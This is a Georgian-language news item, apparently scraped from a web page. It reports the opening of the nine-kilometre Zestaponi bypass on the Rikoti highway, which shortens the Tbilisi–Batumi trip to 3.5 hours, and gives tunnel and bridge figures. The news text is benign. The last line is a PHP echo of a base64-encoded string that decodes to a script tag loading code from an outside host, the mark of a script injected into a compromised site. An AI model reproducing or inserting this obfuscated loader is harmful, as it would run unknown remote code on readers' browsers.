celsiusi
ავერსი შნაიდერი

 დღეიდან, ზესტაფონის შემოვლითი გზის გახსნის შემდეგ, თბილისიდან ბათუმამდე მგზავრობა 3 საათსა და 30 წუთში იქნება შესაძლებელი. აღნიშნულთან დაკავშირებით ინფორმაციას საქართველოს მთავრობა ავრცელებს.

რიკოთის მაგისტრალური გზის მშენებლობის პროექტის ფარგლებში, შორაპანი-არგვეთას მონაკვეთზე ზესტაფონის შემოვლითი ცხრაკილომეტრიანი მაგისტრალური გზა ავტოტრანსპორტისთვის დღეიდან გაიხსნება.

შემოვლითი გზის გავლას მხოლოდ ექვსი წუთი დასჭირდება.

ზესტაფონის შემოვლითი ცხრა კმ-იანი, ოთხზოლიანი ცემენტ-ბეტონის გზა მოიცავს ოთხ გვირაბს და 11 ხიდს.

უკვე მიმდინარეობს შესაბამისი პროცედურები ახალ მაგისტრალურ გზასთან მგზავრთა მომსახურების ცენტრის მოსაწყობად, სადაც გათვალისწინებული იქნება სივრცეები ზესტაფონის ტრადიციული სწრაფი კვების ობიექტებისთვის.

რიკოთის საუღელტეხილო გზის მშენებლობის ფარგლებში შენდება 52 კმ-მდე გზა, რომელიც მოიცავს 97 ხიდსა და 51 გვირაბს. ამ დროისათვის ავტოტრანსპორტისთვის უკვე გახსნილია 36 კმ გზა, აშენებულია 89 ხიდი და გაჭრილია 50 გვირაბი.

181
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");